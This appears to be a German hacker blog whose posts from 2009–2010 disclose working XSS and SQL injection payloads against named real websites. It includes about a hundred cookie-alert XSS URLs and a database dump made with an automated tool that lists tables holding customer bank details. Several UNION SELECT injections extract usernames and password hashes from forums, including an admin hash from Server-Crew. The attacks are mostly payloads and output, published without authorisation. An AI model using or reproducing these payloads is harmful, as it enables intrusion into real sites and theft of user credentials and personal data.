Header
Apr 10 2010

[XSS] www.gelbeseiten.de

posted by J0hn.X3r Vulnerable Sites

Dachte mir nach 2 Jahren, schau ich mal wieder auf www.gelbeseiten.de vorbei, ob sie meine damals gefundene XSS Luecke (http://www.xssed.com/mirror/53711/) gefixxt haben. Und in der Tat, es hat sich was getan.. damals noch:

http://www.gelbeseiten.de/yp/search.yp?distance=0&subject=<script>alert(1337)</script>

klappt nicht mehr.. dafuer heute:

http://www.gelbeseiten.de/yp/search.yp?distance=0&subject="></script><script>alert(1337)</script>

Da bursali auch immer Screenshots als Beleg dazu postet, mach ichs diesmal auch.. Screenshot stammt von “Southpark“:

Nov 30 2009

XSS & SQL-Injection @ Server-Crew.com

posted by J0hn.X3r Vulnerable Sites

Hab heut nach langer Zeit mal wieder eine SQL Injection durchgefuehrt, drauf gestoßen bin ich durch KoC seinem 1337 XSSed Profil.

Geht um die Seite Server-Crew.com – hier mal eine XSS Luecke:

http://server-crew.com/server-crew/index.php?show=<script>alert(1337)</script>

Dann dachte ich mir “wo ne XSS ist, wird auch nicht weit entfernt ne andere Vuln sein :P”, also paar Sekunden weiter gesucht und auf etwas gestoßen:

http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/version()-- f

Ausgabe:

5.0.32-Debian_7etch11

Nett. 🙂

Hab mir paar Dinge ausgeben lassen.. hab dann schnell gemerkt das dort einige DB’s sind. Daher nen Script benutzt (ich weiß, lame usw. Aber da ich die SQL Injection ja gefunden hab sollte das Script nur ein bisschen arbeit abnehmen ;))

Hier die Datenbanken:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v4.0  |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|
 
[+] URL:http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: gcp
	User: [email protected]
	Version: 5.0.32-Debian_7etch11
[+] Showing all databases current user has access too!
[+] Number of Databases: 106
 
[0]confixx
[1]gcp
[2]mumble
[3]mysql
[4]tss_13
[5]tss_9
[6]usr_web0_1
[7]usr_web0_2
[8]usr_web0_3
[9]usr_web0_4
[10]usr_web0_6
[11]usr_web0_8
[12]usr_web10_1
[13]usr_web12_1
[14]usr_web13_1
[15]usr_web14_1
[16]usr_web16_1
[17]usr_web17_1
[18]usr_web19_1
[19]usr_web19_2
[20]usr_web19_3
[21]usr_web19_4
[22]usr_web19_5
[23]usr_web1_1
[24]usr_web1_10
[25]usr_web1_11
[26]usr_web1_2
[27]usr_web1_3
[28]usr_web1_4
[29]usr_web1_5
[30]usr_web1_6
[31]usr_web1_7
[32]usr_web1_8
[33]usr_web1_9
[34]usr_web20_1
[35]usr_web21_1
[36]usr_web21_2
[37]usr_web21_3
[38]usr_web21_4
[39]usr_web21_5
[40]usr_web22_1
[41]usr_web23_1
[42]usr_web24_1
[43]usr_web26_1
[44]usr_web26_2
[45]usr_web28_1
[46]usr_web28_2
[47]usr_web29_1
[48]usr_web29_3
[49]usr_web2_1
[50]usr_web30_1
[51]usr_web30_2
[52]usr_web30_3
[53]usr_web30_4
[54]usr_web30_5
[55]usr_web31_1
[56]usr_web32_1
[57]usr_web33_1
[58]usr_web34_1
[59]usr_web34_2
[60]usr_web35_1
[61]usr_web37_1
[62]usr_web39_1
[63]usr_web39_2
[64]usr_web39_3
[65]usr_web39_4
[66]usr_web39_5
[67]usr_web39_6
[68]usr_web39_7
[69]usr_web3_1
[70]usr_web40_1
[71]usr_web40_2
[72]usr_web41_1
[73]usr_web41_2
[74]usr_web41_3
[75]usr_web43_1
[76]usr_web43_2
[77]usr_web44_1
[78]usr_web44_2
[79]usr_web46_1
[80]usr_web46_2
[81]usr_web47_1
[82]usr_web47_2
[83]usr_web47_3
[84]usr_web48_1
[85]usr_web49_1
[86]usr_web50_1
[87]usr_web50_2
[88]usr_web50_3
[89]usr_web50_4
[90]usr_web52_1
[91]usr_web52_2
[92]usr_web53_1
[93]usr_web54_1
[94]usr_web5_1
[95]usr_web5_2
[96]usr_web62_1
[97]usr_web62_2
[98]usr_web67_1
[99]usr_web8_1
[100]usr_web9_1
[101]usr_web9_2
[102]usr_web9_3
[103]usr_web9_4
[104]usr_web9_5
[105]usr_web9_6

Wer benutzt normalerweise “User: [email protected]“? Ist das nicht ein Sicherheitsrisiko? Anstatt das man nen eigenen User fuer die Page erstellt, alles ueber root machen?!

Doof.

Hier die Tabellen & Columns von der gcp DB:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v4.0  |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v4.0  |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|
 
[+] URL:http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: gcp
	User: [email protected]
	Version: 5.0.32-Debian_7etch11
[+] Showing Tables & Columns from database "gcp"
[+] Number of Tables: 91
 
[Database]: gcp
[Table: Columns]
[0]host_accounts: host_id,server_id,clan_id,insystem,aktiv,suspend,remove,passwd,mysql_pw,hd_quota,base_host,traffic,error,webalizer,auto_pay
[1]host_application: app_id,app_status,app_on_server,port_id,server_id,server_ip,maxplayers,server_type,ftp_passwd,ftp_login,quota,standby,game,game_group,server_type2,maxusers,webdownload,app_load,app_load_new,error_status,server_start,first_use,to_restart
[2]host_billing_accounts: account_id,account_name,account_owner,account_number,bank_number,account_currency,account_type,account_saldo
[3]host_billing_bills: bill_id,bill_customer,bill_date,bill_due_date,bill_content,bill_amount,bill_payment,bill_tax,bill_status,bill_payment_status
[4]host_billing_bills_orders: bill_id,order_id
[5]host_billing_imports: import_id,import_name,import_type,import_field_sep,import_field_start,import_field_posting_text,import_field_saldo,import_field_account,import_field_amount,import_field_date,import_field_date_format,import_field_currency,import_field_reason1,import_field_reason2,import_field_reason3,import_field_reason4,import_field_reason5
[6]host_billing_reminder: reminder_id,user_id,content,reminder_mail,reminder_post,reminder_amount
[7]host_billing_to_export: bill_id,exp_mail,exp_post,exp_print,exp_billing,exp_ec,exp_cc,exp_edit,exp_cancel,exp_delete
[8]host_billing_transactions: transaction_id,transaction_date,transaction_currency,transaction_amount,transaction_account,transaction_reason,transaction_posting_text,transaction_bank_account,transaction_key,transaction_hide,transaction_customer,transaction_bill,transaction_ignore,transaction_special,transaction_credit,transaction_credit_export,transaction_credit_id
[9]host_errors: error_id,server_id,error_cat,error_typ,error_msg,time
[10]host_events: event_id,server_id,event_typ,error_type,event_times,solved,target,error_id,content,content_show_user,modul,modul_id,time_start,time_last,time_solved,event_user,user_id,rep,process_id
[11]host_gameserver: gs_id,gs_status,gs_on_server,port_id,server_id,server_ip,maxplayers,server_type,ftp_passwd,standby,game,game_group,server_type2,maxusers,gs_load,gs_load_new,error_status,server_start,quota,webdownload,first_use,to_restart,timeserver,timeserver_last_check,timeserver_time_empty
[12]host_gs_admins: user_id,master,software,kunden,sources,join_iface,zahlungen,support,server,accounting_admin,accounting_view,accounting_edit,accounting_bill,support_server,support_kunden,events,news,notes1,notes2,newsletter
[13]host_gs_admins_notify: user_id,event_id,notify_status
[14]host_gs_aktuell: gs_id,game_id,mod_id,config_id,copy_config,modul_id,modul,process_id
[15]host_gs_checks: check_name,check_mode,check_value,check_type,modul_id,modul
[16]host_gs_config_file_defaults: config_file,config_group,os,text,mod_id,plugin_id,imp,parts_order
[17]host_gs_config_files: config_file,file,vars,game_id,mod_id,plugin_id,use_sections,section_start,section_end,section_num,filter_double
[18]host_gs_config_files_regexp: regexp_id,config_id,regexp_order,pattern,split,name,dels,imp
[19]host_gs_configs: gs_id,config_id,game_id,mod_id,name,info,last_change,modul_id,modul,process_id
[20]host_gs_dependency: dep_id,software_id,game_id,mod_id,plugin_id,version,typ,imp
[21]host_gs_games: game_id,game,game_name,game_group,default_port,port_offset,qport,qport_offset,qstat_opt,aktiv
[22]host_gs_installed: gs_id,game_id,mod_id,plugin_id,version,modul_id,process_id,modul,autoupdate
[23]host_gs_layout: page_id,mod_id,game_id,page_order,imp
[24]host_gs_layout_field_defaults: field_id,page_id,field_default,text_default,imp
[25]host_gs_layout_field_script: page_id,field_id,script,imp
[26]host_gs_layout_field_text: field_id,kommentar,imp
[27]host_gs_layout_field_values: field_id,gs_id,value,text,config_id,value_key
[28]host_gs_layout_field_vars: field_id,var,value,imp,var_key
[29]host_gs_layout_fields: field_id,page_id,field_os,mod_id,plugin_id,field_desc,name,field_regexp,field_mode,count,config_id,field_group,size,field_type,split,field_order,real_name,script,min,max,step,syntax,einheit,force_enter,default_enter,runtime_replace
[30]host_gs_layout_fields_check: field_id,check_name,check_console_send,check_console_recv,check_console_recv_pos,check_qstat_var,check_plugin_name,check_reaction_nostart,check_reaction_stop,check_reaction_suspend,check_reaction_notify_customer
[31]host_gs_layout_pages: page_id,name,page_type,php_file,aktiv,dir,info,script,imp_id
[32]host_gs_mappool: map_id,map_name,map_datum,map_cat,map_mod,map_win,map_linux,map_comment,map_os
[33]host_gs_mappool_cats: cat_id,mod_id,cat_name,cat_short
[34]host_gs_mappool_files: map_id,files,file_win,file_linux
[35]host_gs_mappool_installed: map_id,gs_id,mod_id,modul,modul_id
[36]host_gs_mods: mod_id,game_id,mod,mod_name,executable,executable_win,params,params_win,standartmap,gamedir,gamedir_win,mapdir,mapdir_win,logdir,logdir_win,execdir,execdir_win,aktiv,webcache,webcache_win
[37]host_gs_plugins: plugin_id,mod_id,game_id,plugin,plugin_name,plugin_typ,aktiv
[38]host_gs_server: server_id,server_ip,ftp_user,ftp_passwd,location,source_server,short_desc,load_max,load_act,os,content_url,ip_start,ip_end,error_status,arch,webdownload_url
[39]host_gs_server_software: server_id,modul
[40]host_gs_software: software_id,game_id,mod_id,plugin_id,version,standart_mods,standart_plugins,extract_dir,remove_path,kommentar,extract_dir_win,remove_path_win,aktiv,install_mode
[41]host_gs_users: gs_id,user_id,admin,config,ftp,user_game,stop,show_varnames
[42]host_host_stats: up,lastupdate,bin,bout,cpu,load1,load2,load3,ram,swap,procs_run,procs_sleep,temp1,temp2,temp3,temp4,fan1,fan2,fan3,fan4,server_id
[43]host_ips: ip_id,ip,ip1,ip2,ip3,ip4,server_id
[44]host_jobs: job_id,pid,job_type,job_server,job_status,prozent,name,job_daten,entered,started
[45]host_kunden: user_id,aktiv,k_alt,k_ansprache,k_vorname,k_nachname,k_strasse,k_plz,k_ort,k_land,k_geburtsdatum,k_tele,k_handy,k_fax,k_bank_inhaber,k_bank_kto_nr,k_bank_blz,k_bank_name,k_bank_zahlung,k_info,paypal_email,bill_tax,bill_post,bill_email_send,bill_text,bill_email
[46]host_kunden_bestellungen: bestellungs_id,user_id,produkt_id,tarif_id,features,bestell_time,erstfreischalt_zeit,kuendigungs_zeit,rechnungs_zeit,sponsoring,freigeschaltet,zahlungs_status,abrechnungsraum,letzte_rechnung,new,new_time,tarif_id_new,features_new,abrechnungsraum_new,tarif_id_set,features_set,abrechnungsraum_set,contract_term,first_bill,individual_monthly_price,individual_price_setup,individual_price_setup_set,individual_monthly_price_set,produkt_id_set,next_set,individual_price_setup_new,individual_monthly_price_new,produkt_id_new,order_ip
[47]host_kunden_bestellungen_features: bestell_id,feature_id,feature_status,setting
[48]host_kunden_bestellungen_indiv: bestell_id,temp_id,settings,status
[49]host_kunden_bestellungen_module: bestellungs_id,modul,modul_id,modul_nocheck,feature_id
[50]host_kunden_bestellungen_old: bestellungs_id,user_id,produkt_id,tarif_id,features,more_data,bemerkung,bestell_time,erstfreischalt_zeit,kuendigungs_zeit,freigeschaltet,zahlungs_status,abrechnungsraum
[51]host_kunden_konto: kunden_id,kontostand,last_change
[52]host_kunden_konto_zahlungen: zahlungs_id,kunden_id,betrag,typ,zweck,bemerkung,zeit,removed,rechnungs_id
[53]host_kunden_rechnungen: rechnungs_id,kunden_id,datum,rechnung,bezahlt,time,mail_send
[54]host_mail_queue: mail_id,mail_date,mail_to,mail_header,mail_subject,mail_body,event_id,mail_last_try
[55]host_module_checks: modul_id,modul,check_name,check_mode,check_value,check_type
[56]host_module_info_text: user_id,modul,modul_id,info_date,info_subject,info_text
[57]host_module_settings: server_id,setting,value,modul
[58]host_module_users: user_id,modul,modul_id,user_setting,user_value
[59]host_mysql: mysql_id,host_id,server_id,new,del
[60]host_news: news_id,user_id,news_datum,news_titel,news_text,news_force,news_public,news_replies
[61]host_news_com: com_id,news_id,com_datum,com_user,com_text,com_ip
[62]host_news_links: link_id,news_id,link_url,link_name
[63]host_php_ini: host_id,ini_var,ini_val
[64]host_produkt_feature_sets: feature_grp,feature_input,feature_display,feature_setting
[65]host_produkt_features: feature_id,tarif_id,feature_grp,feature_name,feature_preis,feature_preis_einmalig,feature_einstellung,feature_order,feature_status,feature_input
[66]host_produkt_tarife: tarif_id,produkt_id,tarif_name,tarif_desc,tarif_anzeigen,tarif_settings_show,tarif_order
[67]host_produkt_zusatz: zusatz_id,produkt_id,zusatz_text
[68]host_produkte: produkt_id,produkt_name,produkt_desc,produkt_games,produkt_anzeigen,produkt_grp,produkt_order
[69]host_server: server_id,server_ip,aktiv,host_space,template_acc,hosting,cluster,cluster_url
[70]host_sessions: session_id,user_id,ip,start,end,lang,session_server
[71]host_status_gameserver: gs_id,server_time,server_ip,server_port,server_qport,server_name,server_players,server_players_max,server_map,server_response,server_game,server_mod
[72]host_support_idents: ident_id,ident_user,ident_key,ident,ident2
[73]host_support_logs: log_id,log_type,log_key,log_date,log_type_id,log_user_id,log_subject
[74]host_support_logs_text: log_id,log_text
[75]host_support_notes: note_id,note_date,note_admin,note_text,note_key,note_todo,note_todo_status,note_todo_admin,note_todo_date,note_todo_date_done
[76]host_support_sessions: chat_id,user_id,time_start,time_end,chat_auth,chat_type,support_cat,user_ident,support_status,last_change,im_status
[77]host_support_sessions_supporters: user_id,login_key,last_online,online_since,time_last,user_status,online_status,last_change,admin_ip,admin_host
[78]host_support_sessions_text: msg_id,chat_id,user_ident,msg_time,msg_text
[79]host_support_sessions_users: chat_id,user_ident,user_id,user_ip,time_last,last_msg,user_name,user_status,user_admin,user_invis
[80]host_teamspeak: ts_id,ts_status,ts_load,port,server_id,process_id,server_desc,slots,codec_celp51,codec_celp63,codec_gsm148,codec_gsm164,codec_windowscelp52,codec_speex2150,codec_speex3950,codec_speex5950,codec_speex8000,codec_speex11000,codec_speex15000,codec_speex18200,codec_speex24600
[81]host_teamspeak_server: process_id,ts_status,server_id,server_ip,port_id,config_id,config_id_global,max_servers,max_slots,ftp_passwd,mysql_passwd,first_start,to_restart,server_start
[82]host_tickets: ticket_id,start,end,last,user_id,admin_id,replies,public,topic,rubrik,prioritaet,stat
[83]host_tickets_posts: post_id,ticket_id,user_id,post_time,post_ip,post_text
[84]host_tickets_rubriken: rubrik_id,rubrik_name
[85]host_todo: host_id,server_id,apache,mysql,php,ftp
[86]host_traffic: host_id,base_host,akt_traffic,ftp_traffic,cpmb,bezahlt
[87]host_traffic_ip: server_ip,zeit,bin,bout,hold
[88]host_updates: ident,version,datum
[89]host_users: user_id,username,user_password,user_actkey,user_newpasswd,user_level,user_last_login,user_last_ip
[90]host_users_details: user_id

Wenn wir nun unsere SQL Injection anpassen:

http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/concat_ws(0x3a,username,user_password)/**/FROM/**/gcp.host_users/**/LIMIT/**/0,1-- f

Dann ist unsere Ausgabe:

admin:97b6e1f38fe6c69d0057860f5e0e2105

Scheint aufm ersten Blick nen MD5 PW zu sein. Pwned?! Pwned! 😀

Najo, mehr werd ich da auch nicht machen, viel Spaß 😉

Nov 11 2009

Ein paar XSS Luecken…

posted by J0hn.X3r Vulnerable Sites

… gefunden von sarex 😉

Ich bin mir sicher das auf einigen Seiten mehr als nur XSS Moeglich ist 😉

http://www.opensecrets.org/pres08/contrib.php?cycle=2008&cid=N00009638><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.ebscohost.com/thisTopic.php?topicID=205><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.lcoastpress.com/journal.php?id=9><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.panelmonkey.org/category.php?id=1><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.coldplay.com/newsdetail.php?id=536><SCRIPT>alert(document.cookie);</SCRIPT>
http://viajar.clix.pt/tesouros.php?id=73><SCRIPT>alert(document.cookie);</SCRIPT>&lg=en
http://www.marshall.org/category.php?id=8><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.master-optics.eu/index.php?id=5><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.worstpreviews.com/headline.php?id=15660><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.michaelpollan.com/article.php?id=87><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.tuba.gov.tr/index_en.php?id=83><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.shocktillyoudrop.com/news/topnews.php?id=10988><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.superherohype.com/news.php?id=8812><SCRIPT>alert(document.cookie);</SCRIPT>
http://onthecommons.org/content.php?id=2542><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.hiof.no/index.php?ID=3><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.globalwitness.org/media_library.php?filter=press_release><SCRIPT>alert(document.cookie);</SCRIPT>
http://roosterteeth.com/archive/episode.php?id=256><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.worstpreviews.com/headline.php?id=15660><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.tuba.gov.tr/index_en.php?id=83><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.master-optics.eu/index.php?id=5><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.knipex.de/index.php?id=113&L=1><SCRIPT>alert(document.cookie);</SCRIPT>
http://freedocumentaries.org/film.php?id=119><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.mediawise.org.uk/display_page.php?id=166><SCRIPT>alert(document.cookie);</SCRIPT>
http://as.americas-society.org/publication.php?id=52><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.worstpreviews.com/headline.php?id=15396><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.thatvideogamesite.com/play.php?id=392><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.shocktillyoudrop.com/news/topnews.php?id=12503><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.corpwatch.org/article.php?id=15308><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.wan-press.org/nie/articles.php?id=1469><SCRIPT>alert(document.cookie);</SCRIPT>
 
http://www.worstpreviews.com/review.php?id=1052><SCRIPT>alert(document.cookie);</SCRIPT>
http://agenda.wormweb.nl/agenda.php?id=2801><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.superherohype.com/news/ghostridernews.php?id=8809><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.tesnexus.com/downloads/file.php?id=9562><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.arabpressnetwork.org/newspaysv2.php?id=144><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.iafastro.org/index.php?id=123&no_cache=1&tx_iaffocuson_pi1%5Btt_single%5D=top&tx_iaffocuson_pi1%5Bpid_back%5D=1><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.coldplay.com/newsdetail.php?id=536><SCRIPT>alert(document.cookie);</SCRIPT>
http://freedocumentaries.org/film.php?id=102><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.nlcnet.org/article.php?id=613><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.sephiroth.it/file_detail.php?id=139><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.lcoastpress.com/journal.php?id=9><SCRIPT>alert(document.cookie);</SCRIPT>
http://freedocumentaries.org/film.php?id=140><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.springer-sbm.com/index.php?id=291&backPID=131&swords=open%20choice&L=0&tx_tnc_news=3665&cHash=1ebd23139a><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.ebscohost.com/thisTopic.php?topicID=205><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.urusoft.net/download.php?id=sw><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.vcn.com/knowledgebase/article.php?id=422><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.shocktillyoudrop.com/news/topnews.php?id=12033><SCRIPT>alert(document.cookie);</SCRIPT>
http://agenda.wormweb.nl/agenda.php?id=2835><SCRIPT>alert(document.cookie);</SCRIPT>
http://onthecommons.org/content.php?id=2540><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.zochrot.org/index.php?id=642><SCRIPT>alert(document.cookie);</SCRIPT>
http://gamerpaper.com/viewarticle.php?id=42><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.michaelpollan.com/article.php?id=87><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.macupdate.com/info.php/id/17787><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.macupdate.com/info.php/id/11582/onyx><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.shocktillyoudrop.com/news/comicconnews.php?id=11172><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.sephiroth.it/file_detail.php?id=124><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.topdownloads.net/software/view.php?id=16523><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.knipex.de/index.php?id=113&L=1><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.globalwitness.org/media_library.php?filter=press_release><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.gamesfirst.com/?id=1132><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.pixheaven.net/galerie_us.php?id=3><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.superherohype.com/news.php?id=8812><SCRIPT>alert(document.cookie);</SCRIPT>
http://freedocumentaries.org/film.php?id=119><SCRIPT>alert(document.cookie);</SCRIPT>
http://ondemand.orf.at/bheute/player.php?id=wie><SCRIPT>alert(document.cookie);</SCRIPT>
http://ioc3.unesco.org/itic/contents.php?id=441><SCRIPT>alert(document.cookie);</SCRIPT>
http://freedocumentaries.org/film.php?id=98><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.netpreserve.org/publications/reports.php?id=005><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.master-optics.eu/index.php?id=5><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.comingsoon.net/news/movienews.php?id=59642><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.michaelpollan.com/article.php?id=97><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.tuba.gov.tr/index_en.php?id=83><SCRIPT>alert(document.cookie);</SCRIPT>
http://roosterteeth.com/archive/episode.php?id=256><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.ioinst.org/contents.php?id=347><SCRIPT>alert(document.cookie);</SCRIPT>
http://gamerpaper.com/viewarticle.php?id=35><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.comingsoon.net/news/movienews.php?id=59996><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.corpwatch.org/article.php?id=15308><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.superherohype.com/news/thornews.php?id=8774><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.springer-sbm.de/index.php?id=291&backPID=132&L=0&tx_tnc_news=4970&cHash=b5a2aa41d8><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.newtonsapple.tv/video.php?id=1671><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.pchardware.ro/Reviews/review.php?id=160><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.wan-press.org/nie/articles.php?id=1469><SCRIPT>alert(document.cookie);</SCRIPT>
http://ioc3.unesco.org/itic/contents.php?id=328><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.coldplay.com/newsdetail.php?id=546><SCRIPT>alert(document.cookie);</SCRIPT>
http://as.americas-society.org/calevent.php?id=622><SCRIPT>alert(document.cookie);</SCRIPT>
http://shocktillyoudrop.com/news/topnews.php?id=12694><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.marshall.org/category.php?id=8><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.comingsoon.net/films.php?id=15813><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.mediawise.org.uk/display_page.php?id=166><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.netpreserve.org/publications/reports.php?id=003><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.stm-assoc.org/news.php?id=255><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.bbi.hu/index.php?id=99&cid=214><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.laptopshowcase.co.uk/downloads.php?id=1><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.timesnews.net/article.php?id=9016458><SCRIPT>alert(document.cookie);</SCRIPT>
http://pressherald.mainetoday.com/story.php?id=293976&ac=PHnws><SCRIPT>alert(document.cookie);</SCRIPT>
http://visindavefur.hi.is/svar.php?id=32019><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.irishheather.com/gallery.php?id=shebeen><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.runningroom.com/hm/inside.php?id=3033><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.bdnews24.com/details.php?id=142979&cid=2><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.shocktillyoudrop.com/news/topnews.php?id=10988><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.awrad.org/etemplate.php?id=193&x=4><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.rochester.edu/news/show.php?id=3385><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.michaelpollan.com/article.php?id=80><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.electionguide.org/country.php?ID=2><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.democracyjournal.org/article.php?ID=6711><SCRIPT>alert(document.cookie);</SCRIPT>
http://www.mediawise.org.uk/display_page.php?id=999><SCRIPT>alert(document.cookie);</SCRIPT>
http://onthecommons.org/content.php?id=2531><SCRIPT>alert(document.cookie);</SCRIPT>
Oct 22 2009

XSS @ MedienTeam66

posted by J0hn.X3r Vulnerable Sites

Grad durch zufall gefunden, als ich mich fuern Newsletter austragen wollte:

http://www.mt66.de/mt66/campaign/2009_09_22_frz_mp3/div/common/unsubscribe.jsp?email=$XSS
 
http://www.mt66.de/mt66/campaign/2009_09_22_frz_mp3/div/common/unsubscribe.jsp?email=<script>alert("XSS")</script>

Vllt fuer den ein oder anderen nuetzlich..

Jan 13 2009

Ein paar SQL Injections

posted by J0hn.X3r Vulnerable Sites

Hi,

da im August/September 2008 Ferien waren und ich dort genug Zeit hatte ein paar SQL Injections zu machen und zu ueben ist hier ne kleine Liste. Da die SQL Injections wie gesagt vom August/September 2008 sind, weiß ich nicht genau ob die meisten davon schon gefixxt sind 🙂

http://www.kidtokid.com/news.php?id=-13/**/UNION/**/SELECT/**/unhex(hex(version())),unhex(hex(concat_ws(0x3a,username,user_password))),3,4,5,6,7,8,9/**/FROM/**/kidtokid_com_phpbb.users/**/limit/**/1,1/*
http://www.kidtokid.com/news.php?id=-13/**/UNION/**/SELECT/**/unhex(hex(version())),unhex(hex(concat_ws(0x3a,login,pass))),3,4,5,6,7,8,9/**/FROM/**/kidtokid_com_site.stores/*
http://www.fc-weilersbach.de/cms/_content/detail.php?nr=-2768/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,name,username,email,password),5,6,7,8,9,10,11,12,13/**/FROM/**/usr_web1410_1.mos_users--
http://www.fc-weilersbach.de/cms/_content/detail.php?nr=-2768/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,name,pw),5,6,7,8,9,10,11,12,13/**/FROM/**/usr_web1410_1.users/**/limit/**/1,1--
http://www.fc-weilersbach.de/cms/_content/detail.php?nr=-2768/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,email,passwd),5,6,7,8,9,10,11,12,13/**/FROM/**/usr_web1410_2.fc1_user--
http://www.schnittberichte.com/schnittbericht.php?ID=-4539+union+select+concat_ws(0x3a,user_id,username,user_password)/**/FROM/**/sc003clu_forum.phpbb_users/**/LIMIT/**/1,1/*
http://www.squadhouse.de/index.php?id=56&srid=-9/**/UNION/**/SELECT/**/version(),2,3,4,5,concat_ws(0x3a,uid,username,pass,email),7,8/**/FROM/**/sqhdatabasev3.user_main--&ac=details 
http://www.versalia.de/forum/beitrag.php?board=v_forum&thread=-3617%27)/**/UNION/**/SELECT/**/concat_ws(0x3a,username,password,email),2,3,4/**/FROM/**/xc_users/**/LIMIT/**/1,1/*
http://www.aktionbildung.de/seiten/newslesen.php?id=-91+union+select+1,2,3,concat_ws(0x3a,username,password,email)+from+forums_auth--
